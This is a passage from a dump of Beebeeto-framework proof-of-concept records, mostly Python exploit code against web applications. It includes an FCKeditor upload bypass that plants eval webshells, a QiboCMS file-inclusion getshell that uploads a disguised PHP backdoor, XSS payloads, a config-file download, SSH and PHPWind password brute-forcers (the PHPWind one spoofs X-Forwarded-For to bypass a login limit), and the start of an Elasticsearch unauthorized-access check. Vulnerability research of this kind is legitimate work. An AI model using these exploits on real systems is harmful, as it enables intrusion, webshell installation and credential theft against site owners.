'http',\r\n 'port' : [80],\r\n 'layer4_protocol' : ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul' : {\r\n 'app_name' : 'FCKeditor', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version' : ['<=2.4.3'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'File Upload', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['FCKeditor\u6f0f\u6d1e', 'FCK\u7f16\u8f91\u5668\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e', 'asp', 'php', 'aspx'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'fckeditor <= 2.4.3\u7248\u672c, upload.asp\u6587\u4ef6\u4e3a\u9ed1\u540d\u5355\u8fc7\u6ee4, \u53ef\u7ed5\u8fc7\u4e0a\u4f20', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n host = args['options']['target'] + args['options']['path']\r\n version_number = cls.get_version(host)\r\n\r\n if version_number <= '2.4.3':\r\n args['success'] = True\r\n args['poc_ret']['reason'] = '\u6b64\u7248\u672c\u4e3a' + str(version_number) + '\u7b26\u5408\u6f0f\u6d1e\u5229\u7528'\r\n return args\r\n else:\r\n args['success'] = False\r\n return 
args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n Path = args['options']['path']\r\n host = url + Path\r\n if url.startswith('http://'):\r\n url_noheader = url[7:]\r\n\r\n for script_type in ['asp', 'aspx', 'php']:\r\n if script_type == 'asp':\r\n shell_name = 'css3.cer'\r\n shell_content = '<%eval request(\"Bee\")%>'\r\n path = host + 'editor/filemanager/upload/asp/upload.asp'\r\n elif script_type == 'aspx':\r\n shell_name = 'css3.aspx '\r\n shell_content = '<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Bee\"],\"unsafe\");%>'\r\n path = host + 'editor/filemanager/upload/aspx/upload.aspx'\r\n elif script_type == 'php':\r\n shell_name = 'css3.php '\r\n path = host + 'editor/filemanager/upload/php/upload.php'\r\n shell_content = '<?php eval($_POST[Bee]) ?>'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n s.connect((url_noheader, 80))\r\n s.settimeout(8)\r\n\r\n payload = '-----------------------------20537215486483\\r\\n'\r\n payload += 'Content-Disposition: form-data; name=\"NewFile\"; filename=\"%s\"\\r\\n' % (shell_name)\r\n payload += 'Content-Type: image/jpeg\\r\\n\\r\\n'\r\n payload += 'GIF89a\\r\\n'\r\n payload +='%s\\r\\n\\r\\n\\r\\n' % (shell_content)\r\n payload += '-----------------------------20537215486483--\\r\\n'\r\n payload_length = len(payload)\r\n\r\n packet = 'POST ' + path + ' HTTP/1.1\\r\\n'\r\n packet += 'HOST: ' + url_noheader + '\\r\\n'\r\n packet += 'Connection: Close\\r\\n'\r\n packet += 'Content-Type: multipart/form-data; boundary=---------------------------20537215486483\\r\\n'\r\n packet += 'Content-Length: %d' % payload_length+'\\r\\n'\r\n packet += '\\r\\n'\r\n packet = packet + payload\r\n\r\n s.send(packet)\r\n data = ''\r\n while True:\r\n buf = s.recv(1024)\r\n if not buf:\r\n break\r\n data += buf\r\n s.close()\r\n re_shellurl = re.compile('OnUploadCompleted\\(.+\\)')\r\n shellurl = re_shellurl.findall(data)[0]\r\n shellurl = re.findall('../(\\w.+?)\"', 
shellurl)\r\n if len(shellurl) > 0:\r\n break\r\n if len(shellurl)>0:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url + '/' + shellurl[0]\r\n return args\r\n else:\r\n args['success'] = False\r\n print '[-]Sorry i faild with Old version exp --- <<' + script_type + '>>'\r\n return args\r\n\r\n @classmethod\r\n def get_version(cls, fck_url):\r\n try:\r\n url_dic = dict()\r\n version_url = fck_url + '/editor/dialog/fck_about.html'\r\n print version_url\r\n version_resp = urllib2.urlopen(version_url).read()\r\n re_version = re.compile('<b>(\\d\\.\\d[\\.\\d]*).{0,10}<\\/b>')\r\n parr = re_version.findall(version_resp)\r\n print '[+]The fck version is %s'%parr[0]\r\n return parr[0]\r\n except:\r\n return '8.8.8'\r\n\r\n def _init_user_parser(self):\r\n self.user_parser.add_option('-p', '--path',\r\n action = 'store', dest = 'path', default = None, help = 'please input the FCKEditor Path !')\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "fckeditor <= 2.4.3\u7248\u672c, upload.asp\u6587\u4ef6\u4e3a\u9ed1\u540d\u5355\u8fc7\u6ee4, \u53ef\u7ed5\u8fc7\u4e0a\u4f20", "app_name": "FCKeditor", "id": "poc-2015-0031", "layer4_protocol": null}
{"create_date": "2015-02-04 11:57:39", "name": "Websitebaker CMS v2.8.3 Reflecting XSS vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u585e\u4e07\u94c1\u725b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Websitebaker CMS,XSS\u6f0f\u6d1e,modify.php?page_id=1,CVE-2015-0553", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0028',\r\n 'name': 'Websitebaker CMS v2.8.3 Reflecting XSS vulnerability POC',\r\n 'author': '\u585e\u4e07\u94c1\u725b',\r\n 'create_date': '2015-01-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Websitebaker CMS',\r\n 'vul_version': ['v2.8.3'],\r\n 'type': 'Cross-Site Scripting',\r\n 'tag': ['Websitebaker CMS', 'XSS\u6f0f\u6d1e', 'modify.php?page_id=1', 'CVE-2015-0553'],\r\n 'desc': '''\r\n \u9690\u85cf\u8868\u5355\u4e2d\u5f15\u53d1\u7684\u53cd\u5c04XSS\u6f0f\u6d1e\r\n ''',\r\n 'references': ['http://packetstormsecurity.com/files/130008/CMS-Websitebaker-2.8.3-SP3-Cross-Site-Scripting.html',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/admin/pages/modify.php?page_id=1%22><script>alert(%27XSS%27)</script><!--'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"XSS\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u9690\u85cf\u8868\u5355\u4e2d\u5f15\u53d1\u7684\u53cd\u5c04XSS\u6f0f\u6d1e", "app_name": "Other", "id": "poc-2015-0028", "layer4_protocol": null}
{"create_date": "2015-02-01 01:36:42", "name": "QiboCMS V5.0 /hr/listperson.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "WenR0", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "Qibocms\u6f0f\u6d1e,Qibo getshell\u6f0f\u6d1e,/hr/listperson.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urlparse\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0024', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'QiboCMS V5.0 /hr/listperson.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC & Exploit', # \u540d\u79f0\r\n 'author': 'WenR0', # \u4f5c\u8005\r\n 'create_date': '2015-01-31', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Qibocms', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['v5.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Local File Inclusion', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Qibocms\u6f0f\u6d1e', 'Qibo getshell\u6f0f\u6d1e', '/hr/listperson.php', 'php'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Qibocms /hr/listperson.php \u7cfb\u7edf\u6587\u4ef6\u5305\u542b\u81f4\u65e0\u9650\u5236Getshell', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': 
['http://www.wooyun.org/bugs/wooyun-2015-081470', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 'FidTpl[list]=../images/default/default.js'\r\n file_path = \"/hr/listperson.php?%s\" % payload\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n html = requests.get(verify_url).content\r\n if 'var evt = (evt) ? evt : ((window.event) ? window.event : \"\");' in html:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n # \u4e0a\u4f20\u6587\u4ef6 upload file\r\n upload_file_url = '%s/hy/choose_pic.php' % args['options']['target']\r\n gif_file = {'postfile': ('test.gif', 'Gif89a <?php echo(md5(\"bb2\"));@eval($_POST[\"bb2\"]);', 'image/gif')}\r\n gif_data = {'action': 'upload'}\r\n upload_content = requests.post(upload_file_url, files=gif_file, data=gif_data).content\r\n # \u83b7\u53d6\u6587\u4ef6\u7684\u5730\u5740 get file url\r\n pic_reg = re.compile(r\"\"\"set_choooooooooooosed\\('\\d+','(.*)','.*'\\);\"\"\")\r\n pic_file = pic_reg.findall(upload_content)\r\n pic_file = urlparse.urlparse((pic_file[0])[:-4]).path\r\n # \u6587\u4ef6\u5305\u542b is include?\r\n file_path = \"/hr/listperson.php?FidTpl[list]=../%s\" % pic_file\r\n webshell = '%s%s' % (args['options']['target'], file_path)\r\n # \u9a8c\u8bc1\u662f\u5426\u6210\u529f check\r\n page_content = requests.get(webshell).content\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in page_content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = webshell\r\n args['poc_ret']['post_password'] = 'bb2'\r\n return args\r\n return args\r\n \r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Qibocms /hr/listperson.php \u7cfb\u7edf\u6587\u4ef6\u5305\u542b\u81f4\u65e0\u9650\u5236Getshell", "app_name": 
"qibocms", "id": "poc-2015-0024", "layer4_protocol": null}
{"create_date": "2015-01-29 19:06:02", "name": "SSH Brute (\u66b4\u529b\u7834\u89e3\u5bc6\u7801) POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u66b4\u529b\u7834\u89e3", "tag": "SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177,SSH Brute,SSH\u5bc6\u7801\u7206\u7834", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urlparse\r\nimport paramiko\r\n\r\nimport SETTINGS\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0022',\r\n 'name': 'SSH Brute (\u66b4\u529b\u7834\u89e3\u5bc6\u7801) POC',\r\n 'author': '1024',\r\n 'create_date': '2015-01-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'ssh',\r\n 'port': [22],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ssh',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177', 'SSH Brute', 'SSH\u5bc6\u7801\u7206\u7834'],\r\n 'desc': '\u52a0\u8f7d\u5b57\u5178\u66b4\u529b\u7834\u89e3SSH\u5bc6\u7801',\r\n 'references': ['http://www.beebeeto.com',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n if not url.startswith(('http://', 'https://')):\r\n url = 'http://%s' % url\r\n target = urlparse.urlparse(url).netloc\r\n domain_user = target.split('.')[-2]\r\n # Using Beebeeto-framework /utils password_list\r\n password_list = open('%s/utils/payload/password_top100' % SETTINGS.FRAMEWORK_DIR)\r\n user_list = ['root', 'test', 'admin', domain_user]\r\n for pwd in password_list.readlines():\r\n for user in user_list:\r\n if args['options']['verbose']:\r\n print '[*] Content host: ' + target\r\n print '[+] 
User/Password: %s/%s' % (user, pwd)\r\n client = paramiko.SSHClient()\r\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n try:\r\n client.connect(target, 22, username=user, password=pwd.strip(), timeout=8)\r\n stdin, stdout, stderr = client.exec_command('uname -a')\r\n args['success'] = True\r\n args['poc_ret']['ssh_target'] = target\r\n args['poc_ret']['ssh_user'] = user\r\n args['poc_ret']['ssh_passwd'] = pwd.strip()\r\n args['poc_ret']['ssh_uname'] = stdout.read()\r\n client.close()\r\n return args\r\n except Exception, e:\r\n client.close()\r\n if str(e) == 'Authentication failed.':\r\n print '[-] Fail: %s\\n\\n' % e\r\n continue\r\n else:\r\n args['success'] = False\r\n args['exception'] = 'Failed to connect host/port.'\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u52a0\u8f7d\u5b57\u5178\u66b4\u529b\u7834\u89e3SSH\u5bc6\u7801", "app_name": "Linux", "id": "poc-2015-0022", "layer4_protocol": null}
{"create_date": "2015-01-29 17:46:36", "name": "Exponent CMS 2.3.2 /exponent/index.php Reflected XSS Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u585e\u4e07\u94c1\u725b", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Exponent CMS\u6f0f\u6d1e,XSS\u6f0f\u6d1e,index.php?controller=search&src=,CVE-2015-1177", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0021',\r\n 'name': 'Exponent CMS 2.3.2 /exponent/index.php Reflected XSS Vulnerability POC',\r\n 'author': '\u585e\u4e07\u94c1\u725b',\r\n 'create_date': '2015-01-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Exponent CMS',\r\n 'vul_version': ['2.3.2'],\r\n 'type': 'Cross-Site Scripting',\r\n 'tag': ['Exponent CMS\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'index.php?controller=search&src=','CVE-2015-1177'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.securityfocus.com/bid/59887/',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/exponent/index.php?controller=search&src=f324e%22><script>alert(1)</script>9cbae6bf552&action=search&search_string=test&int=%0d'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(1)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = 
verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0021", "layer4_protocol": null}
{"create_date": "2015-01-28 14:14:37", "name": "QiboCMS V7 /do/job.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "xiao8bs", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Qibo\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/do/job.php,filedown,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2015-0020',\r\n 'name': 'QiboCMS V7 /do/job.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'xiao8bs',\r\n 'create_date': '2015-01-28',\r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'Qibo',\r\n 'vul_version': ['V7',], \r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Qibo\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/do/job.php', 'filedown', 'php'],\r\n 'desc': 'Qibo V7 has File down in do/job.php.',\r\n 'references': ['N/A', \r\n ], \r\n }, \r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 'job=download&url=ZGF0YS9jb25maWcucGg8'\r\n verify_url = args['options']['target'] + '/do/job.php?%s' % payload\r\n request = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n response = urllib2.urlopen(request)\r\n reg = re.compile(\"webdb\\['mymd5'\\]\")\r\n if reg.findall(response.read()):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n 
\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n \r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Qibo V7 has File down in do/job.php.", "app_name": "qibocms", "id": "poc-2015-0020", "layer4_protocol": null}
{"create_date": "2015-01-25 21:49:15", "name": "PHPWIND v9.0 X-Forwarded-For IP\u9650\u5236\u7ed5\u8fc7\u5bfc\u81f4\u53ef\u88ab\u7206\u7834\u5bc6\u7801\u6f0f\u6d1e Exploit", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "PHPWIND IP\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e,PHPWIND\u66b4\u529b\u7834\u89e3\u6f0f\u6d1e,X-Forwarded-For,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport random\r\nimport requests\r\nimport urlparse\r\n\r\nimport SETTINGS\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0017',\r\n 'name': 'PHPWIND V9.0 X-Forwarded-For IP\u9650\u5236\u7ed5\u8fc7\u5bfc\u81f4\u53ef\u88ab\u7206\u7834\u5bc6\u7801\u6f0f\u6d1e Exploit',\r\n 'author': 'user1018',\r\n 'create_date': '2015-01-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Other',\r\n 'tag': ['PHPWIND IP\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e', 'PHPWIND\u66b4\u529b\u7834\u89e3\u6f0f\u6d1e', 'X-Forwarded-For', 'php'],\r\n 'desc': 'PHPWIND v9.0 /admin.php or /windid/admin.php IP\u4fee\u6539XFF\u7ed5\u8fc7\u767b\u5f55\u9650\u5236\u6f0f\u6d1e\u3002',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @staticmethod\r\n def get_login_info(url, args):\r\n \"\"\"\r\n 1. Obtain the url without verification code.\r\n 2. 
Obtain the csrf_token.\r\n \"\"\"\r\n try:\r\n windid_ver_check, admin_ver_check = 1, 1 # Verification code\r\n csrf_token_re = re.compile(r'<input type=\"hidden\" name=\"csrf_token\" value=\"(.*)\"/></form>')\r\n windid_url = '%s/windid/admin.php' % url\r\n windid_req = requests.get(windid_url)\r\n windid_content = windid_req.content\r\n if windid_req.status_code == 200:\r\n if 'id=\"J_admin_name\" required name=\"username\"' in windid_content:\r\n if 'name=\"code\" placeholder=\"\u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801\"' not in windid_content:\r\n windid_ver_check = 0\r\n try:\r\n csrf_token = csrf_token_re.findall(windid_content)[0]\r\n except:\r\n args['success'] = False\r\n return args\r\n else:\r\n windid_ver_check = 1\r\n\r\n admin_url = '%s/admin.php' % url\r\n admin_req = requests.get(admin_url)\r\n admin_content = admin_req.content\r\n if admin_req.status_code == 200:\r\n if 'id=\"J_admin_name\" required name=\"username\"' in admin_content:\r\n if 'name=\"code\" placeholder=\"\u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801\"' not in admin_content:\r\n admin_ver_check = 0\r\n try:\r\n csrf_token = csrf_token_re.findall(admin_content)[0]\r\n except:\r\n args['success'] = False\r\n return args\r\n else:\r\n admin_ver_check = 1\r\n except:\r\n args['success'] = False\r\n return args\r\n\r\n if windid_ver_check == 0:\r\n return windid_url, csrf_token\r\n elif admin_ver_check == 0:\r\n return admin_url, csrf_token\r\n return None, None\r\n\r\n\r\n @staticmethod\r\n def get_username(url, args):\r\n verify_url = '%s/index.php?m=space&uid=1' % url\r\n homepage = requests.get(verify_url).content\r\n user_re = re.compile(r'class=\"message J_qlogin_trigger J_send_msg_pop\" data-name=\"(.*)\"><em></em>')\r\n try:\r\n username = user_re.findall(homepage)[0]\r\n except:\r\n username = 'admin'\r\n return username\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n password_list = open('%s/utils/payload/password_top1000' % SETTINGS.FRAMEWORK_DIR, 'r')\r\n for pwd in 
password_list.readlines():\r\n url = args['options']['target']\r\n ver_url, csrf_token = cls.get_login_info(url, args)\r\n ip = str(random.randint(1,244))+\".\"+str(random.randint(100,244))+\".\"+str(random.randint(100,244))+\".\"+str(random.randint(100,244))\r\n headers_fake = {\"Host\": urlparse.urlparse(url).netloc,\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\",\r\n \"X-Forwarded-For\": ip,\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection': 'keep-alive'}\r\n\r\n if ver_url and csrf_token:\r\n # Obtain username\r\n username = cls.get_username(url, args)\r\n # Brute func\r\n headers_fake['Cookie'] = 'csrf_token=%s' % csrf_token\r\n payload = 'username=%s&password=%s&submit=&csrf_token=%s' % (username, pwd.split()[0], csrf_token)\r\n if args['options']['verbose']:\r\n print '[*] POST Username: %s' % username\r\n print '[*] POST Password: %s' % pwd.split()[0]\r\n print '[*] POST Payload: %s\\n' % payload\r\n try:\r\n req_content = requests.post('%s?a=login'%ver_url, data=payload, headers=headers_fake).content\r\n except:\r\n continue\r\n if 'admin.php?a=logout\" class=' in req_content:\r\n args['success'] = True\r\n args['poc_ret']['login_url'] = ver_url\r\n args['poc_ret']['username'] = username\r\n args['poc_ret']['password'] = pwd.split()[0]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PHPWIND v9.0 /admin.php or /windid/admin.php IP\u4fee\u6539XFF\u7ed5\u8fc7\u767b\u5f55\u9650\u5236\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2015-0017", "layer4_protocol": null}
{"create_date": "2015-01-20 11:32:40", "name": "Elasticsearch 9200\u7aef\u53e3 \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Elasticsearch\u6f0f\u6d1e,\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0014',\r\n 'name': 'Elasticsearch 9200\u7aef\u53e3 \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-01-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Elasticsearch\u6f0f\u6d1e', '\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': '\u9ed8\u8ba4\u60c5\u51b5\uff0cElasticsearch\u5f00\u542f\u540e\u4f1a\u76d1\u542c9200\u7aef\u53e3\u53ef\u4ee5\u5728\u672a\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u8bbf\u95ee\uff0c\u4ece\u800c\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f',\r\n 'references': ['',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def 